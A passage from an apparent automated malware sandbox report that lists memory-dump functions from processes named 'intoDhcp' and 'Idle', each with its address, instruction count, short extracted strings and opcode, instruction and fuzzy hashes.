                  • Opcode ID: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction ID: 45db22eca49bf6d55f29746af9659d65589cf408075368fb500bfbacb40a3961
                  • Opcode Fuzzy Hash: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction Fuzzy Hash: DEF0E93090E78D8FE75A5FB088245B937A0BF46305F4604BFF859C60E2DB789658C701
                  Function 00007FFD9BA0D630 Relevance: .0, Instructions: 32COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44851f4af9fa8afe42ebca63d47ef83fe45d70adcca2f56a0e0456d38491ab11
                  • Instruction ID: 2e023ed8671d73850e91569c32688bf3339ea8f250cbb2e5f28c7107c53f27a8
                  • Opcode Fuzzy Hash: 44851f4af9fa8afe42ebca63d47ef83fe45d70adcca2f56a0e0456d38491ab11
                  • Instruction Fuzzy Hash: 0FF01731E1950E8FDB64EB84C8A1ABD77F4EF1A314F120139D48AE72A5CAB866408B40

                  Non-executed Functions

                  Function 00007FFD9BA0F019 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$)$Y$e
                  • API String ID: 0-363832505
                  • Opcode ID: 3f72024a90e5f973c0906e77c8559b85306257c15d49ec0271d2685fb2427ecc
                  • Instruction ID: 5fe68fe8948d0c26a4e6d2b9cdfbb3b7391c6e20cd1629f9e445a99b7bcdd93b
                  • Opcode Fuzzy Hash: 3f72024a90e5f973c0906e77c8559b85306257c15d49ec0271d2685fb2427ecc
                  • Instruction Fuzzy Hash: B7211571E0976E8FDB68CF50C8A07E9B7B2AB55301F0001FED449A6291CBB85A84DF01

                  Executed Functions

                  Function 00007FFD9B9E3655 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: O_H
                  • API String ID: 0-364725170
                  • Opcode ID: 4662ad76dee0659c90cabe7e76604053754928a64c2b9171f86f42a8d6368a43
                  • Instruction ID: 86975e8cc874a8ecfae70c41ab2959f7e43573bf5828feef710352a6955ede07
                  • Opcode Fuzzy Hash: 4662ad76dee0659c90cabe7e76604053754928a64c2b9171f86f42a8d6368a43
                  • Instruction Fuzzy Hash: 0591E072A1D94E8FEB95DB68C8657EC7BE1EF99310F4001BAD00DD72DACBA42945CB40
                  Function 00007FFD9B9EEEC7 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$O$Q${
                  • API String ID: 0-1370898747
                  • Opcode ID: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction ID: dd738953d8d974184c4ac78a826ffdb5cecd9b1abd8aef51db95765b84d499ff
                  • Opcode Fuzzy Hash: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction Fuzzy Hash: 8F21D670E1962D8FEB64DF54C8587EABBB2BB54301F0141B9D40DA62A1CB785B80CF44
                  Function 00007FFD9B9EEA63 Relevance: 3.9, Strings: 3, Instructions: 138COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: 516b7117cdcee626ced243f882bb99c68fbe50e35d72cac409685efcab8d0af1
                  • Instruction ID: 9f7f4f0c64d0873f5b51fd4dce69c6eba022c1337f103a8b49ef0d2c2b969fbd
                  • Opcode Fuzzy Hash: 516b7117cdcee626ced243f882bb99c68fbe50e35d72cac409685efcab8d0af1
                  • Instruction Fuzzy Hash: 1B5107B1E14A1D8BDBA8DF18C8947A9B7B1FF58301F0041FAE10DE32A1DA346E818F45
                  Function 00007FFD9B9E2C48 Relevance: .4, Instructions: 412COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5238ef13df66ebc209309cd6d48baa228dff8414530668dc20f1910868877fc0
                  • Instruction ID: e96dbf2410899601909cd3362ce563986806a92b1bb12fcfb7538b3591603ae5
                  • Opcode Fuzzy Hash: 5238ef13df66ebc209309cd6d48baa228dff8414530668dc20f1910868877fc0
                  • Instruction Fuzzy Hash: 75E1B231B1955E9FEB68EB6898A4BF8BBA1FF54310F0500BED40ED71D2DE256984CB40
                  Function 00007FFD9B9E2C58 Relevance: .4, Instructions: 401COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7df6b096aecd3cef59185426fed356991c135fd48c5453ee701f45b7dede8b39
                  • Instruction ID: bc0bdd5147089c03a7381a2c8dc7d1134e388622f433ef09dcecf267a224da90
                  • Opcode Fuzzy Hash: 7df6b096aecd3cef59185426fed356991c135fd48c5453ee701f45b7dede8b39
                  • Instruction Fuzzy Hash: AAD1B231F1955E9EEB68EB6898A4BF8BBA1FF54310F0500BED40ED71D2DE256984CB40
                  Function 00007FFD9B9E2D38 Relevance: .4, Instructions: 389COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9a3a9ae7f56ede5b9fa50070994ff34c72e41544ccd99e574c1f0c903c69db4
                  • Instruction ID: f8ea3f673465f05827a626866d079a2095746d23a0430bf61ecb16f1986290bf
                  • Opcode Fuzzy Hash: d9a3a9ae7f56ede5b9fa50070994ff34c72e41544ccd99e574c1f0c903c69db4
                  • Instruction Fuzzy Hash: 4FE15F71E2965D9FEBA8EB58C4A47B8B7A1FF58301F0500BED40ED32D6DA756984CB00
                  Function 00007FFD9B9E2CC8 Relevance: .4, Instructions: 351COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7b9af67ce81d5e8c3ad2f978dbd5ffcf0ff8e31b5ee07fcfe834dfc6d176f811
                  • Instruction ID: 54679d1ce841c5615cfa715291f0c13adb8a32fd5f59abe2a958fe533681c6c9
                  • Opcode Fuzzy Hash: 7b9af67ce81d5e8c3ad2f978dbd5ffcf0ff8e31b5ee07fcfe834dfc6d176f811
                  • Instruction Fuzzy Hash: 9EC18E31F1955E8EEBA8EB6894A4BF8B7A1FF58310F0500BAD40ED71D6DE356984CB40
                  Function 00007FFD9B9EDAA9 Relevance: .3, Instructions: 345COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2db6f5573a895a16ba06c0644a25cb75f21c8c9b7a32bf5c8fac2b9c0dd51364
                  • Instruction ID: 6ccd6406a693fa63134d715db3e909f14917ccc0dbb02f9c08414b0144d133fc
                  • Opcode Fuzzy Hash: 2db6f5573a895a16ba06c0644a25cb75f21c8c9b7a32bf5c8fac2b9c0dd51364
                  • Instruction Fuzzy Hash: 6AC15171E29A4D8FEBA8EB58C4A57B8B7A1FF58301F0500BED40DD71E6DA756A44CB00
                  Function 00007FFD9B9E1718 Relevance: .3, Instructions: 292COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 181a9ee6bdd0358cd950c3f40a7ec8bde51cd5560f3278e8e82092a3b84def04
                  • Instruction ID: bf5ec73659b011f9ad8fd84e6111de88d893a4837583294d47c673799fdb4f8a
                  • Opcode Fuzzy Hash: 181a9ee6bdd0358cd950c3f40a7ec8bde51cd5560f3278e8e82092a3b84def04
                  • Instruction Fuzzy Hash: 7091E131B2DA5D4FDB58DE5C88616A977E2FFD8308B15057EE45DC72A2CE30AE028780
                  Function 00007FFD9B9E1D6D Relevance: .2, Instructions: 194COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10e2d5a94a58c62fa5d98cdfb485070c66de6a929630c5957a0cb8edc5b0dddf
                  • Instruction ID: b43f545db73fdea95bad7d2541a959f336cc79294c036f6367b2769e69fc506d
                  • Opcode Fuzzy Hash: 10e2d5a94a58c62fa5d98cdfb485070c66de6a929630c5957a0cb8edc5b0dddf
                  • Instruction Fuzzy Hash: A651DF31B28A5D4FDB58DE5888645BA77E2FBD8304B15457EE45AC7292CE30A9028780
                  Function 00007FFD9B9E3291 Relevance: .2, Instructions: 177COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6000e6e4f501b447f607c91dbf364d1118123e5339bf10e95797de7d83da2361
                  • Instruction ID: 0c9859076e77be7427de3dc8ecda687a0304eb5636569d15db6a67141a681c1c
                  • Opcode Fuzzy Hash: 6000e6e4f501b447f607c91dbf364d1118123e5339bf10e95797de7d83da2361
                  • Instruction Fuzzy Hash: 84515671E1D51E9FEB65EBA8C4A46EDBBF1EF58300F51407AD009E72A1DA386A44CB10
                  Function 00007FFD9B9EC299 Relevance: .2, Instructions: 171COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f419a072322a1cca88af0c03ca247588db8dd9364010b746dda90723434340d8
                  • Instruction ID: e1b39119a9c3cc7648c0d2b4c23781fc6378b4b59a8caeedb9d50a2a6f1eb1b2
                  • Opcode Fuzzy Hash: f419a072322a1cca88af0c03ca247588db8dd9364010b746dda90723434340d8
                  • Instruction Fuzzy Hash: C6514E70E1951D9FEBA4EBA8C4657EDB7F1FF59300F11007AD04DE72A2DA38AA418B40
                  Function 00007FFD9B9EB05A Relevance: .2, Instructions: 150COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd32aa10e28a6f7080958d91464cea5dab6c0abf175f7ccc7a91e823a2a3b8eb
                  • Instruction ID: 47fb2189853a4cdec1e836de847354da56a7df7844161736c784508e0bc2a08d
                  • Opcode Fuzzy Hash: dd32aa10e28a6f7080958d91464cea5dab6c0abf175f7ccc7a91e823a2a3b8eb
                  • Instruction Fuzzy Hash: 72412862F1E54E6FE721EBA888E92E977E0FF55310F0544B6D069C70A6EE24B604C341
                  Function 00007FFD9B9E2185 Relevance: .1, Instructions: 140COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f93477d00741f9c50cd63b9cfb7686f426e2e4dabff24817ba06585dab0598d1
                  • Instruction ID: 5f77cd1cd02cd58a0bfcf72954fa80815e74a680ef399f5fa2b1276f26cd613b
                  • Opcode Fuzzy Hash: f93477d00741f9c50cd63b9cfb7686f426e2e4dabff24817ba06585dab0598d1
                  • Instruction Fuzzy Hash: C7418D31B1E68E5FE769D7B888655B97BE1EF86300B0540FBD44DC72E2DE28AA418341
                  Function 00007FFD9B9EBE19 Relevance: .1, Instructions: 139COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9be3047532ef144d9e543d4d3150bcb2041e72ab2edb0c92aa8d8bc62e923500
                  • Instruction ID: 322c7a5521c4a395db80452d89dd9f56cc2036f3e70ae83a218f84ea80de4073
                  • Opcode Fuzzy Hash: 9be3047532ef144d9e543d4d3150bcb2041e72ab2edb0c92aa8d8bc62e923500
                  • Instruction Fuzzy Hash: 72511B70E1A61D9FDB64DFA4D4A46ED7BF1EF15300F11047AE00AE72A2DB38AA44CB50
                  Function 00007FFD9B9EC342 Relevance: .1, Instructions: 110COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c5e23fa99b25c597d375fc9e701782ed380b2dc04b438c5756866d48a8cb7af
                  • Instruction ID: 07d9170d666490b0f1a1c1b547b01cb515311a30970d4f14efcec46645a2059b
                  • Opcode Fuzzy Hash: 0c5e23fa99b25c597d375fc9e701782ed380b2dc04b438c5756866d48a8cb7af
                  • Instruction Fuzzy Hash: 6731E771E1D91D9EEBA4EB9894A57FCB7B1FF98300F511079D04DE3292DE246A428B40
                  Function 00007FFD9B9E0805 Relevance: .1, Instructions: 102COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 92b6891991741f9089d02e9c304aec8e3bc1e7b4118388b180ea89127eb85cd6
                  • Instruction ID: c5ba2441461b70be69aea1e85a6d649906221efbfa97dbb6f4c490e7edc460ee
                  • Opcode Fuzzy Hash: 92b6891991741f9089d02e9c304aec8e3bc1e7b4118388b180ea89127eb85cd6
                  • Instruction Fuzzy Hash: 8B217C22B0E54A6FE711B7BCD87A5E93BE0FF11314B0A41B3D49DCB0A3DD25A645C280
                  Function 00007FFD9B9EC3BA Relevance: .1, Instructions: 100COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 63a8c2e541aa36f81788b35355935def3be216b84fcbe574c1293995b1a55363
                  • Instruction ID: f538ee3e471342a62f348634f54b827282447b1ee203b4e6b455a62fa7339f12
                  • Opcode Fuzzy Hash: 63a8c2e541aa36f81788b35355935def3be216b84fcbe574c1293995b1a55363
                  • Instruction Fuzzy Hash: E9311671E1991D9EEBA4EB9884A57FCBBB1FF59300F511039D04DE7292DE246A818B40
                  Function 00007FFD9B9E34A8 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c01a273df15e1ad271569ce4471a1ae31b618305a5fc07ce0043874c9d139c91
                  • Instruction ID: 7ea7ebaa11c98e9a0627944230560af1cc50dbdc5366dbd9a8c2f488f7e7c77e
                  • Opcode Fuzzy Hash: c01a273df15e1ad271569ce4471a1ae31b618305a5fc07ce0043874c9d139c91
                  • Instruction Fuzzy Hash: EF21AF3095E68A9FE753EBB4C8685A97FF0FF0A310F0905F6D059CB0A2DA389645CB11
                  Function 00007FFD9B9E35D5 Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ce1e0ebcbb7cd6c39d3b29b1e8ea08b556ce339c27a6bbd0a0b7ccb8644fece
                  • Instruction ID: f8f27b5efd4038d2f40ad7e7ccdbcd5e19347fe53e3c183cec9c0cee318aa9e7
                  • Opcode Fuzzy Hash: 5ce1e0ebcbb7cd6c39d3b29b1e8ea08b556ce339c27a6bbd0a0b7ccb8644fece
                  • Instruction Fuzzy Hash: 74211D30A1A64E9FDB69DFA4C4695BE77A0FF18304F1105BAE41EC62A1DF35A6508B40
                  Function 00007FFD9B9E3551 Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c1fa41644c0afbe59830af23a9bb4dd42d25aa42867bf9a4b1e1a4d714485d8
                  • Instruction ID: cd6bf04837e7cba9af9519706a81a194af4e714b65ae46ae0138235a4248d49b
                  • Opcode Fuzzy Hash: 9c1fa41644c0afbe59830af23a9bb4dd42d25aa42867bf9a4b1e1a4d714485d8
                  • Instruction Fuzzy Hash: 79114230A1E54E9FDB66DB64C8695BE77B0FF18304F05497AD41DC62A1DF35A610C740
                  Function 00007FFD9B9E0A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f15dfe516033ecfa4f3c8f02b3f79797e491a300556b914287ef1fec01ae5d20
                  • Instruction ID: 7a3fdf51b2af4b943ca39ac9af98fc07e238d4eb130ed666b11cad9e393f065c
                  • Opcode Fuzzy Hash: f15dfe516033ecfa4f3c8f02b3f79797e491a300556b914287ef1fec01ae5d20
                  • Instruction Fuzzy Hash: A611C130E1A50E6FE790EBA8C86A5FD7BE1FF58700F4605B6D459C30A6EE34A6408740
                  Function 00007FFD9B9EB2D8 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2087bac0dc6abf90f671988517b3d490dedd65e4edca589ddeb7d5eb85cdc168
                  • Instruction ID: 5d73b5fb32777f6a22f2c327138905f46b78a7711369072995c2645f3df96eda
                  • Opcode Fuzzy Hash: 2087bac0dc6abf90f671988517b3d490dedd65e4edca589ddeb7d5eb85cdc168
                  • Instruction Fuzzy Hash: 6D217C30E1E61F9BFB60AAA0C4957FE77E1AF54300F164575C01A921A6DE38A7848A50
                  Function 00007FFD9B9E121D Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4559e444c3d41f812cd12e74598e19e1152399c5fe237077c2f68d981e4ed833
                  • Instruction ID: b3dc9c12ef02141dbbe8250f57ccf2d9cc090944e87a6cc7d382d92ea5e59f0d
                  • Opcode Fuzzy Hash: 4559e444c3d41f812cd12e74598e19e1152399c5fe237077c2f68d981e4ed833
                  • Instruction Fuzzy Hash: 5211E670A1A55E5EEB59DBA8C8B92B93BA0FF59304F4105BED05AC71E2DE349644C700
                  Function 00007FFD9B9ECAE0 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb09b2eea89110204686f41c18b35c4a6adeb93a64e379a0ad891452d74a3e73
                  • Instruction ID: ba95b142b5eae76aaaacec5836d384ea021895e3ecdd4e42962f81553b6ea369
                  • Opcode Fuzzy Hash: bb09b2eea89110204686f41c18b35c4a6adeb93a64e379a0ad891452d74a3e73
                  • Instruction Fuzzy Hash: 28118F30A1A68E5FEB56EB78C8695B97BF0FF19300F0604BBD459C70A2DE756A84C700
                  Function 00007FFD9B9ECED0 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd36a3252c1867b9793371731cee9c438ac2d4d94bf5bd0091826f7d46226d11
                  • Instruction ID: 23e7c7865d7709aaedaed9af26d1f926052ccc6e7e330cf02985b0995bd6b420
                  • Opcode Fuzzy Hash: dd36a3252c1867b9793371731cee9c438ac2d4d94bf5bd0091826f7d46226d11
                  • Instruction Fuzzy Hash: D5119130A19A0E9EEBA8EF68C4696BE7BE1FF58314F14057ED41EC21A5CE356640C740
                  Function 00007FFD9B9EBD95 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7f48781334d9976aa12e1f0b066834bd3e55589a1880ea5f8b663a9db4e1220
                  • Instruction ID: 1866266a1c6875ff9955200595600e827cbdd4024523dd645760f9caad6e8803
                  • Opcode Fuzzy Hash: a7f48781334d9976aa12e1f0b066834bd3e55589a1880ea5f8b663a9db4e1220
                  • Instruction Fuzzy Hash: 07118270A1954E9FDB55EF64C4A82BD7BE0FF18300F4105BAD41AC71A1DE359690C700
                  Function 00007FFD9B9EC219 Relevance: .1, Instructions: 52COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 30cb77b99820762701eaa5ae68a77c322561206abab182b8a1cc11cba9074c3f
                  • Instruction ID: 085e214f1e7468ba426c171c1afe78c55ccacee10f48cadc74d46b27ab7b132c
                  • Opcode Fuzzy Hash: 30cb77b99820762701eaa5ae68a77c322561206abab182b8a1cc11cba9074c3f
                  • Instruction Fuzzy Hash: FF11A030A1964E9FDB55EBA8C4682BA7BB0FF19300F0205BAD45AC71A2DB35A640C741
                  Function 00007FFD9B9ED79D Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d4ddae8b5efd97d7cf9167cce56d68fc3bd052233833ef87fd2dd7166ad9595b
                  • Instruction ID: 6db7b7434af04da85059bf4b5d13eb3c25946ab92c2cf66acf0df7c4f87319c5
                  • Opcode Fuzzy Hash: d4ddae8b5efd97d7cf9167cce56d68fc3bd052233833ef87fd2dd7166ad9595b
                  • Instruction Fuzzy Hash: 2911AD70A1960E9FDB68EF68C4686BD7BF0FF18304F5204BED42AD61A1DB35A650CB40
                  Function 00007FFD9B9E05D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 22923bd621e640c7133f38dc23458d0976882c06cb58bffd4345298d227c5763
